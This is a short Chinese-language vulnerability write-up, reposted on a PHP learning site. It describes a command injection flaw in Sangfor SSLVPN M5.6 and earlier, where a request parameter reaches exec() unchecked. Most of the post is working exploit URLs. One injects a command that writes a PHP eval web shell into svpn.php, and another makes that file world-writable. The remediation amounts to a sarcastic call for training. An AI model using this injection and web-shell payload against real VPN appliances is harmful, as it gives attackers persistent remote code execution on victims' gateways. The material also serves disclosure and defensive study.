来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 深信服的程序员安全意识太低了,直接一个参数可以执行任意命令$args = $_REQUEST[#39;cmd#39;];/*something here*/exec(tsutil -proxy $ip $args, $output, $ret);懂php exec函数的都一眼看出问题版......
深信服的程序员安全意识太低了,直接一个参数可以执行任意命令
$args = $_REQUEST['cmd'];
/*something here*/
exec("tsutil -proxy $ip $args", $output, $ret);
懂php exec函数的都一眼看出问题
版本SSLVPN M5.6及以下 没测试最新版本
http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||echo%20'%3C?php%20eval($_POST[cmd]);?%3E'%20%3E/app/usr/sbin/webui/html/svpn.php
执行echo '<?php eval($_POST[cmd]);?>' >/app/usr/sbin/webui/html/svpn.php 生成一句话
http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||chmod 777 /app/usr/sbin/webui/html/svpn.php
修改svpn权限
SSLVPN.SANGFOR.COM不是真实地址 只是一个例子
$args = $_REQUEST['cmd'];
$ip = $_SERVER['REMOTE_ADDR'];
exec("tsutil -proxy $ip $args", $output, $ret);
修复方案:
哎 我还能说什么
去找人做个程序员安全编程意识培训吧
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com